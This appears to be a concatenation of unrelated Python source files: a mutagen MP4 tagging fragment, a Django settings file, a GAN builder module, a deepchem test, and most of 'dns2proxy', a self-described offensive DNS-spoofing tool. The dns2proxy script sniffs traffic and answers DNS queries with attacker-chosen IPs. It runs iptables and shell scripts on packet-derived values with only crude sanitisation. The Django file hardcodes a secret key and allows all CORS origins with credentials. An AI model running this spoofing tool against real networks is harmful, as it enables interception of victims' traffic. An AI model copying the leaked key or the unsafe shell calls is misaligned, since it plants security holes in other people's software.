b"\xa9gen", b"\xa9lyr", b"catg", b"keyw", b"\xa9too",
b"cprt", b"soal", b"soaa", b"soar", b"sonm", b"soco",
b"sosn", b"tvsh", b"tven", b"tvnn"]:
__atoms[name] = (__parse_text, __render_text)
def pprint(self):
values = []
for key, value in iteritems(self):
if not isinstance(key, text_type):
key = key.decode("latin-1")
if key == "covr":
values.append("%s=%s" % (key, ", ".join(
["[%d bytes of data]" % len(data) for data in value])))
elif isinstance(value, list):
for v in value:
values.append("%s=%r" % (key, v))
else:
values.append("%s=%r" % (key, value))
return "\n".join(values)
class MP4Info(StreamInfo):
"""MPEG-4 stream information.
Attributes:
* bitrate -- bitrate in bits per second, as an int
* length -- file length in seconds, as a float
* channels -- number of audio channels
* sample_rate -- audio sampling rate in Hz
* bits_per_sample -- bits per sample
* codec (string):
* if starting with ``"mp4a"`` uses an mp4a audio codec
(see the codec parameter in rfc6381 for details e.g. ``"mp4a.40.2"``)
* for everything else see a list of possible values at
http://www.mp4ra.org/codecs.html
e.g. ``"mp4a"``, ``"alac"``, ``"mp4a.40.2"``, ``"ac-3"`` etc.
* codec_description (string):
Name of the codec used (ALAC, AAC LC, AC-3...). Values might change in
the future, use for display purposes only.
"""
bitrate = 0
channels = 0
sample_rate = 0
bits_per_sample = 0
codec = u""
codec_name = u""
def __init__(self, atoms, fileobj):
try:
moov = atoms[b"moov"]
except KeyError:
raise MP4StreamInfoError("not a MP4 file")
for trak in moov.findall(b"trak"):
hdlr = trak[b"mdia", b"hdlr"]
ok, data = hdlr.read(fileobj)
if not ok:
raise MP4StreamInfoError("Not enough data")
if data[8:12] == b"soun":
break
else:
raise MP4StreamInfoError("track has no audio data")
mdhd = trak[b"mdia", b"mdhd"]
ok, data = mdhd.read(fileobj)
if not ok:
raise MP4StreamInfoError("Not enough data")
try:
version, flags, data = parse_full_atom(data)
except ValueError as e:
raise MP4StreamInfoError(e)
if version == 0:
offset = 8
fmt = ">2I"
elif version == 1:
offset = 16
fmt = ">IQ"
else:
raise MP4StreamInfoError("Unknown mdhd version %d" % version)
end = offset + struct.calcsize(fmt)
unit, length = struct.unpack(fmt, data[offset:end])
try:
self.length = float(length) / unit
except ZeroDivisionError:
self.length = 0
try:
atom = trak[b"mdia", b"minf", b"stbl", b"stsd"]
except KeyError:
pass
else:
self._parse_stsd(atom, fileobj)
def _parse_stsd(self, atom, fileobj):
"""Sets channels, bits_per_sample, sample_rate and optionally bitrate.
Can raise MP4StreamInfoError.
"""
assert atom.name == b"stsd"
ok, data = atom.read(fileobj)
if not ok:
raise MP4StreamInfoError("Invalid stsd")
try:
version, flags, data = parse_full_atom(data)
except ValueError as e:
raise MP4StreamInfoError(e)
if version != 0:
raise MP4StreamInfoError("Unsupported stsd version")
try:
num_entries, offset = cdata.uint32_be_from(data, 0)
except cdata.error as e:
raise MP4StreamInfoError(e)
if num_entries == 0:
return
# look at the first entry if there is one
entry_fileobj = cBytesIO(data[offset:])
try:
entry_atom = Atom(entry_fileobj)
except AtomError as e:
raise MP4StreamInfoError(e)
try:
entry = AudioSampleEntry(entry_atom, entry_fileobj)
except ASEntryError as e:
raise MP4StreamInfoError(e)
else:
self.channels = entry.channels
self.bits_per_sample = entry.sample_size
self.sample_rate = entry.sample_rate
self.bitrate = entry.bitrate
self.codec = entry.codec
self.codec_description = entry.codec_description
def pprint(self):
return "MPEG-4 audio (%s), %.2f seconds, %d bps" % (
self.codec_description, self.length, self.bitrate)
class MP4(FileType):
"""An MPEG-4 audio file, probably containing AAC.
If more than one track is present in the file, the first is used.
Only audio ('soun') tracks will be read.
:ivar info: :class:`MP4Info`
:ivar tags: :class:`MP4Tags`
"""
MP4Tags = MP4Tags
_mimes = ["audio/mp4", "audio/x-m4a", "audio/mpeg4", "audio/aac"]
def load(self, filename):
self.filename = filename
with open(filename, "rb") as fileobj:
try:
atoms = Atoms(fileobj)
except AtomError as err:
reraise(error, err, sys.exc_info()[2])
try:
self.info = MP4Info(atoms, fileobj)
except error:
raise
except Exception as err:
reraise(MP4StreamInfoError, err, sys.exc_info()[2])
if not MP4Tags._can_load(atoms):
self.tags = None
else:
try:
self.tags = self.MP4Tags(atoms, fileobj)
except error:
raise
except Exception as err:
reraise(MP4MetadataError, err, sys.exc_info()[2])
def add_tags(self):
if self.tags is None:
self.tags = self.MP4Tags()
else:
raise error("an MP4 tag already exists")
@staticmethod
def score(filename, fileobj, header_data):
return (b"ftyp" in header_data) + (b"mp4" in header_data)
Open = MP4
def delete(filename):
"""Remove tags from a file."""
MP4(filename).delete()
class MediaKind:
MUSIC = [1]
AUDIO_BOOK = [2]
MUSIC_VIDEO = [6]
MOVIE = [9]
TV_SHOW = [10]
BOOKLET = [11]
RINGTONE = [14]
class HDVideo:
STANDARD = [0]
P720 = [1]
P1080 = [2]
class ContentRating:
NONE = [0]
CLEAN = [2]
EXPLICIT = [4]
|
py | 1a30383081f520f321035a843ac38a723ccdbdd5 | """
Django settings for lofiback project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
#Права на загруженные файлы
FILE_UPLOAD_PERMISSIONS = 0o644
CORS_ORIGIN_WHITELIST = (
'localhost:3000',
'127.0.0.1:3000',
'.lofichan.ru',
'api.lofichan.ru',
'lofichan.ru',
)
CORS_ALLOW_METHODS = (
'DELETE',
'GET',
'OPTIONS',
'PATCH',
'POST',
'PUT',
)
CORS_ALLOW_CREDENTIALS = True
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': 'error.log',
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True,
},
},
'loggers': {
'django': {
'handlers': ['file'],
'level': 'ERROR',
'propagate': True,
},
},
}
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '*(qi2^67--t7g^b#4@amwxlpmawg2a@o^^6zm@pyhvui$44r!$'
#
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = os.environ.get('S_DEBUG')
ALLOWED_HOSTS = ['127.0.0.1', 'localhost', '.lofichan.ru', 'api.lofichan.ru', 'lofichan.ru', 'st.lofichan.ru']
CORS_ORIGIN_ALLOW_ALL = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'api',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lofiback.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lofiback.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': os.environ.get('DB_NAME_L'),
'USER': os.environ.get('DB_USER'),
'PASSWORD': os.environ.get('DB_PASSWORD'),
'HOST': os.environ.get('DB_HOST'),
'PORT': os.environ.get('DB_PORT')
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
PROJECT_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_ROOT = os.path.join(PROJECT_DIR, 'templates')
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "templates")
]
|
py | 1a3038d94c2a4ee31ee03541ef314aa0d483e6c9 | # python3.7
"""Collects all available models together."""
from .model_zoo import MODEL_ZOO
from .pggan_generator import PGGANGenerator
from .pggan_discriminator import PGGANDiscriminator
from .stylegan_generator import StyleGANGenerator
from .stylegan_discriminator import StyleGANDiscriminator
from .stylegan2_generator import StyleGAN2Generator
from .stylegan2_discriminator import StyleGAN2Discriminator
from .stylegan2_gs_generator import StyleGAN2_GS_Generator
# from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d
__all__ = [
'MODEL_ZOO', 'PGGANGenerator', 'PGGANDiscriminator', 'StyleGANGenerator',
'StyleGANDiscriminator', 'StyleGAN2Generator', 'StyleGAN2Discriminator',
'StyleGAN2_GS_Generator', 'build_generator', 'build_discriminator', 'build_model',
]
_GAN_TYPES_ALLOWED = ['pggan', 'stylegan', 'stylegan2', 'stylegan2_gs']
_MODULES_ALLOWED = ['generator', 'discriminator']
def build_generator(gan_type, resolution, **kwargs):
"""Builds generator by GAN type.
Args:
gan_type: GAN type to which the generator belong.
resolution: Synthesis resolution.
**kwargs: Additional arguments to build the generator.
Raises:
ValueError: If the `gan_type` is not supported.
NotImplementedError: If the `gan_type` is not implemented.
"""
if gan_type not in _GAN_TYPES_ALLOWED:
raise ValueError(f'Invalid GAN type: `{gan_type}`!\n'
f'Types allowed: {_GAN_TYPES_ALLOWED}.')
if gan_type == 'pggan':
return PGGANGenerator(resolution, **kwargs)
if gan_type == 'stylegan':
return StyleGANGenerator(resolution, **kwargs)
if gan_type == 'stylegan2':
return StyleGAN2Generator(resolution, **kwargs)
if gan_type == 'stylegan2_gs':
return StyleGAN2_GS_Generator(resolution, **kwargs)
raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')
def build_discriminator(gan_type, resolution, **kwargs):
"""Builds discriminator by GAN type.
Args:
gan_type: GAN type to which the discriminator belong.
resolution: Synthesis resolution.
**kwargs: Additional arguments to build the discriminator.
Raises:
ValueError: If the `gan_type` is not supported.
NotImplementedError: If the `gan_type` is not implemented.
"""
if gan_type not in _GAN_TYPES_ALLOWED:
raise ValueError(f'Invalid GAN type: `{gan_type}`!\n'
f'Types allowed: {_GAN_TYPES_ALLOWED}.')
if gan_type == 'pggan':
return PGGANDiscriminator(resolution, **kwargs)
if gan_type == 'stylegan':
return StyleGANDiscriminator(resolution, **kwargs)
if gan_type == 'stylegan2':
return StyleGAN2Discriminator(resolution, **kwargs)
raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')
def build_model(gan_type, module, resolution, **kwargs):
"""Builds a GAN module (generator/discriminator/etc).
Args:
gan_type: GAN type to which the model belong.
module: GAN module to build, such as generator or discrimiantor.
resolution: Synthesis resolution.
**kwargs: Additional arguments to build the discriminator.
Raises:
ValueError: If the `module` is not supported.
NotImplementedError: If the `module` is not implemented.
"""
if module not in _MODULES_ALLOWED:
raise ValueError(f'Invalid module: `{module}`!\n'
f'Modules allowed: {_MODULES_ALLOWED}.')
if module == 'generator':
return build_generator(gan_type, resolution, **kwargs)
if module == 'discriminator':
return build_discriminator(gan_type, resolution, **kwargs)
raise NotImplementedError(f'Unsupported module `{module}`!')
def parse_gan_type(module):
"""Parses GAN type of a given module.
Args:
module: The module to parse GAN type from.
Returns:
A string, indicating the GAN type.
Raises:
ValueError: If the GAN type is unknown.
"""
if isinstance(module, (PGGANGenerator, PGGANDiscriminator)):
return 'pggan'
if isinstance(module, (StyleGANGenerator, StyleGANDiscriminator)):
return 'stylegan'
if isinstance(module, (StyleGAN2Generator, StyleGAN2Discriminator)):
return 'stylegan2'
if isinstance(module, (StyleGAN2_GS_Generator, StyleGAN2Discriminator)):
return 'stylegan2_gs'
raise ValueError(f'Unable to parse GAN type from type `{type(module)}`!')
|
py | 1a3038fb7ec02caeb8de6f54fa19c0c5fe51e69c | import os
import unittest
import numpy as np
from deepchem.utils import rdkit_util
from deepchem.utils.fragment_util import get_contact_atom_indices
from deepchem.utils.fragment_util import merge_molecular_fragments
from deepchem.utils.fragment_util import get_partial_charge
from deepchem.utils.fragment_util import strip_hydrogens
from deepchem.utils.fragment_util import MolecularFragment
from deepchem.utils.fragment_util import AtomShim
class TestFragmentUtil(unittest.TestCase):
def setUp(self):
# TODO test more formats for ligand
current_dir = os.path.dirname(os.path.realpath(__file__))
self.protein_file = os.path.join(
current_dir, '../../feat/tests/data/3ws9_protein_fixer_rdkit.pdb')
self.ligand_file = os.path.join(current_dir,
'../../feat/tests/data/3ws9_ligand.sdf')
def test_get_contact_atom_indices(self):
complexes = rdkit_util.load_complex([self.protein_file, self.ligand_file])
contact_indices = get_contact_atom_indices(complexes)
assert len(contact_indices) == 2
def test_create_molecular_fragment(self):
mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)
fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
assert len(mol_rdk.GetAtoms()) == len(fragment.GetAtoms())
assert (fragment.GetCoords() == mol_xyz).all()
def test_strip_hydrogens(self):
mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)
fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
# Test on RDKit
frag = strip_hydrogens(mol_xyz, mol_rdk)
def test_merge_molecular_fragments(self):
mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)
fragment1 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
fragment2 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)
joint = merge_molecular_fragments([fragment1, fragment2])
assert len(mol_rdk.GetAtoms()) * 2 == len(joint.GetAtoms())
def test_get_partial_charge(self):
from rdkit import Chem
mol = Chem.MolFromSmiles("CC")
atom = mol.GetAtoms()[0]
partial_charge = get_partial_charge(atom)
assert partial_charge == 0
def test_atom_shim(self):
atomic_num = 5
partial_charge = 1
atom_coords = np.array([0., 1., 2.])
shim = AtomShim(atomic_num, partial_charge, atom_coords)
assert shim.GetAtomicNum() == atomic_num
assert shim.GetPartialCharge() == partial_charge
assert (shim.GetCoords() == atom_coords).all()
|
py | 1a303993436f86b3ec594b86e83d431455b50013 | #!/usr/bin/python2.6
'''
dns2proxy for offensive cybersecurity v1.0
python dns2proxy.py -h for Usage.
Example:
python2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200
Example for no forwarding (only configured domain based queries and spoofed hosts):
python2.6 dns2proxy.py -i eth0 -noforward
Example for no forwarding but add IPs
python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward
Author: Leonardo Nve ( [email protected])
'''
import dns.message
import dns.rrset
import dns.resolver
import socket
import numbers
import threading
from struct import *
import datetime
import pcapy
import os
import signal
import errno
from time import sleep
import argparse
consultas = {}
spoof = {}
dominios = {}
nospoof = []
nospoofto = []
victims = []
LOGREQFILE = "dnslog.txt"
LOGSNIFFFILE = "snifflog.txt"
LOGALERTFILE = "dnsalert.txt"
RESOLVCONF = "resolv.conf"
victim_file = "victims.cfg"
nospoof_file = "nospoof.cfg"
nospoofto_file = "nospoofto.cfg"
specific_file = "spoof.cfg"
dominios_file = "domains.cfg"
parser = argparse.ArgumentParser()
parser.add_argument("-N", "--noforward", help="DNS Fowarding OFF (default ON)", action="store_true")
parser.add_argument("-i", "--interface", help="Interface to use", default="eth0")
parser.add_argument("-u", "--ip1", help="First IP to add at the response", default=None)
parser.add_argument("-d", "--ip2", help="Second IP to add at the response", default=None)
parser.add_argument("-I", "--ips", help="List of IPs to add after ip1,ip2 separated with commas", default=None)
parser.add_argument("-S", "--silent", help="Silent mode", action="store_true")
parser.add_argument("-A", "--adminIP", help="Administrator IP for no filtering", default="192.168.0.1")
args = parser.parse_args()
debug = not args.silent
dev = args.interface
adminip = args.adminIP
ip1 = args.ip1
ip2 = args.ip2
Forward = not args.noforward
fake_ips = []
# List of of ips
if args.ips is not None:
for ip in args.ips.split(","):
fake_ips.append(ip)
Resolver = dns.resolver.Resolver()
######################
# GENERAL SECTION #
######################
def save_req(lfile, str):
f = open(lfile, "a")
f.write(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' ' + str)
f.close()
def SIGUSR1_handle(signalnum, frame):
global noserv
global Resolver
noserv = 0
DEBUGLOG('Reconfiguring....')
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
return
def process_files():
global nospoof
global spoof
global nospoof_file
global specific_file
global dominios_file
global dominios
global nospoofto_file
for i in nospoof[:]:
nospoof.remove(i)
for i in nospoofto[:]:
nospoofto.remove(i)
for i in victims[:]:
victims.remove(i)
dominios.clear()
spoof.clear()
nsfile = open(nospoof_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Non spoofing ' + h[0])
nospoof.append(h[0])
nsfile.close()
nsfile = open(victim_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Spoofing only to ' + h[0])
victims.append(h[0])
nsfile.close()
nsfile = open(nospoofto_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 0:
DEBUGLOG('Non spoofing to ' + h[0])
nospoofto.append(h[0])
nsfile.close()
nsfile = open(specific_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 1:
DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1])
spoof[h[0]] = h[1]
nsfile.close()
nsfile = open(dominios_file, 'r')
for line in nsfile:
if line[0] == '#':
continue
h = line.split()
if len(h) > 1:
DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1])
dominios[h[0]] = h[1]
nsfile.close()
return
def DEBUGLOG(str):
global debug
if debug:
print str
return
def handler_msg(id):
os.popen('./handler_msg.sh %s >> handler_msg.log 2>> handler_msg_error.log &'%id.replace('`','_').replace(';','_').replace('|','_').replace('&','_'))
return
######################
# SNIFFER SECTION #
######################
class ThreadSniffer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
#DEBUGLOG( self.getName(), " Sniffer Waiting connections....")
go()
def go():
global ip1
global dev
bpffilter = "dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)" % (
ip1, ip1, adminip)
cap = pcapy.open_live(dev, 255, 1, 0)
cap.setfilter(bpffilter)
DEBUGLOG( "Starting sniffing in (%s = %s)...." % (dev, ip1))
#start sniffing packets
while True:
try:
(header, packet) = cap.next()
parse_packet(packet)
except:
pass
#DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen())))
#function to parse a packet
def parse_packet(packet):
eth_length = 14
eth_protocol = 8
global ip1
global consultas
global ip2
#Parse IP packets, IP Protocol number = 8
if eth_protocol == 8:
#Parse IP header
#take first 20 characters for the ip header
ip_header = packet[eth_length:20 + eth_length]
#now unpack them :)
iph = unpack('!BBHHHBBH4s4s', ip_header)
version_ihl = iph[0]
#version = version_ihl >> 4
ihl = version_ihl & 0xF
iph_length = ihl * 4
#ttl = iph[5]
protocol = iph[6]
s_addr = socket.inet_ntoa(iph[8])
d_addr = socket.inet_ntoa(iph[9])
#TCP protocol
if protocol == 6:
t = iph_length + eth_length
tcp_header = packet[t:t + 20]
#now unpack them :)
tcph = unpack('!HHLLBBHHH', tcp_header)
source_port = tcph[0]
dest_port = tcph[1]
# sequence = tcph[2]
# acknowledgement = tcph[3]
# doff_reserved = tcph[4]
# tcph_length = doff_reserved >> 4
if consultas.has_key(str(s_addr)):
DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr))
DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port))
# print '>>>> '+str(s_addr)+' esta en la lista!!!!.....'
comando = 'sh ./IPBouncer.sh %s %s %s %s' % (
ip2, str(dest_port), consultas[str(s_addr)], str(dest_port))
os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))
#print '>>>> ' + comando
comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
ip1, str(dest_port), str(s_addr), str(source_port))
os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))
comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (
ip1, str(dest_port), str(s_addr), str(source_port))
os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))
#print '>>>> ' + comando
#UDP packets
elif protocol == 17:
u = iph_length + eth_length
#udph_length = 8
#udp_header = packet[u:u + 8]
#now unpack them :)
#udph = unpack('!HHHH', udp_header)
#source_port = udph[0]
#dest_port = udph[1]
#length = udph[2]
#checksum = udph[3]
#DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum))
#h_size = eth_length + iph_length + udph_length
#data_size = len(packet) - h_size
#get data from the packet
#data = packet[h_size:]
######################
# DNS SECTION #
######################
def respuestas(name, type):
global Resolver
DEBUGLOG('Query = ' + name + ' ' + type)
try:
answers = Resolver.query(name, type)
except Exception, e:
DEBUGLOG('Exception...')
return 0
return answers
def requestHandler(address, message):
resp = None
dosleep = False
try:
message_id = ord(message[0]) * 256 + ord(message[1])
DEBUGLOG('msg id = ' + str(message_id))
if message_id in serving_ids:
DEBUGLOG('I am already serving this request.')
return
serving_ids.append(message_id)
DEBUGLOG('Client IP: ' + address[0])
prov_ip = address[0]
try:
msg = dns.message.from_wire(message)
try:
op = msg.opcode()
if op == 0:
# standard and inverse query
qs = msg.question
if len(qs) > 0:
q = qs[0]
DEBUGLOG('request is ' + str(q))
save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\n')
if q.rdtype == dns.rdatatype.A:
DEBUGLOG('Doing the A query....')
resp, dosleep = std_A_qry(msg, prov_ip)
elif q.rdtype == dns.rdatatype.PTR:
#DEBUGLOG('Doing the PTR query....')
resp = std_PTR_qry(msg)
elif q.rdtype == dns.rdatatype.MX:
DEBUGLOG('Doing the MX query....')
resp = std_MX_qry(msg)
elif q.rdtype == dns.rdatatype.TXT:
#DEBUGLOG('Doing the TXT query....')
resp = std_TXT_qry(msg)
elif q.rdtype == dns.rdatatype.AAAA:
#DEBUGLOG('Doing the AAAA query....')
resp = std_AAAA_qry(msg)
else:
# not implemented
resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented
else:
# not implemented
resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented
except Exception, e:
DEBUGLOG('got ' + repr(e))
resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error
DEBUGLOG('resp = ' + repr(resp.to_wire()))
except Exception, e:
DEBUGLOG('got ' + repr(e))
resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error
DEBUGLOG('resp = ' + repr(resp.to_wire()))
except Exception, e:
# message was crap, not even the ID
DEBUGLOG('got ' + repr(e))
if resp:
s.sendto(resp.to_wire(), address)
if dosleep: sleep(1) # Performance downgrade no tested jet
def std_PTR_qry(msg):
qs = msg.question
DEBUGLOG( str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'PTR')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text())
resp.answer.append(rrset)
return resp
def std_MX_qry(msg):
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
#Temporal disable MX responses
resp = make_response(qry=msg)
hosts = respuestas(iparpa[:-1], 'MX')
if isinstance(hosts, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
DEBUGLOG('Adding ' + host.to_text())
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text())
resp.answer.append(rrset)
return resp
def std_TXT_qry(msg):
qs = msg.question
print str(len(qs)) + ' questions.'
iparpa = qs[0].to_text().split(' ', 1)[0]
print 'Host: ' + iparpa
resp = make_response(qry=msg)
host = iparpa[:-1]
punto = host.find(".")
dominio = host[punto:]
host = "."+host
spfresponse = ''
if (dominio in dominios) or (host in dominios):
ttl = 1
DEBUGLOG('Alert domain! (TXT) ID: ' + host)
# Here the HANDLE!
#os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
DEBUGLOG('Responding with SPF = ' + spfresponse)
rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
resp.answer.append(rrset)
return resp
hosts = respuestas(iparpa[:-1], 'TXT')
if isinstance(hosts, numbers.Integral):
print 'No host....'
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
print 'Adding ' + host.to_text()
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text())
resp.answer.append(rrset)
return resp
def std_SPF_qry(msg):
qs = msg.question
print str(len(qs)) + ' questions.'
iparpa = qs[0].to_text().split(' ', 1)[0]
print 'Host: ' + iparpa
resp = make_response(qry=msg)
# host = iparpa[:-1]
# punto = host.find(".")
# dominio = host[punto:]
# host = "."+host
# if (dominio in dominios) or (host in dominios):
# ttl = 1
# DEBUGLOG('Alert domain! (TXT) ID: ' + host)
# # Here the HANDLE!
# #os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
# save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\n')
# if host in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%host
# if dominio in dominios: spfresponse = "v=spf1 a:mail%s/24 mx -all "%dominio
# DEBUGLOG('Responding with SPF = ' + spfresponse)
# rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)
# resp.answer.append(rrset)
# return resp
hosts = respuestas(iparpa[:-1], 'SPF')
if isinstance(hosts, numbers.Integral):
print 'No host....'
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
for host in hosts:
print 'Adding ' + host.to_text()
rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text())
resp.answer.append(rrset)
return resp
def std_AAAA_qry(msg):
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp
def std_A_qry(msg, prov_ip):
global consultas
global ip1
global ip2
global fake_ips
dosleep = False
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
resp = make_response(qry=msg)
for q in qs:
qname = q.name.to_text()[:-1]
DEBUGLOG('q name = ' + qname)
host = qname.lower()
# dom1 = None
# dominio = None
# punto1 = host.rfind(".")
# punto2 = host.rfind(".",0,punto1-1)
# if punto1 > -1:
# dom1 = host[punto1:]
# if punto2 > -1:
# dominio = host[punto2:]
find_host = None
for d in dominios:
if d in host:
find_host = d
if (find_host is not None):
ttl = 1
# id = host[:punto2]
# if dom1 in dominios:
# id = host[:punto1]
# dominio = dom1
DEBUGLOG('Alert domain! ID: ' + host)
# Here the HANDLE!
#os.popen("python /yowsup/yowsup-cli -c /yowsup/config -s <number> \"Host %s\nIP %s\" > /dev/null &"%(id,prov_ip));
handler_msg(host)
save_req(LOGALERTFILE, 'Alert domain! ID: ' + host + '\n')
if host not in spoof:
DEBUGLOG('Responding with IP = ' + dominios[find_host])
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[find_host])
else:
DEBUGLOG('Responding with IP = ' + spoof[host])
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, spoof[host])
resp.answer.append(rrset)
return resp, dosleep
if ".%s"%host in dominios:
dominio = ".%s"%host
ttl = 1
DEBUGLOG('Responding with IP = ' + dominios[dominio])
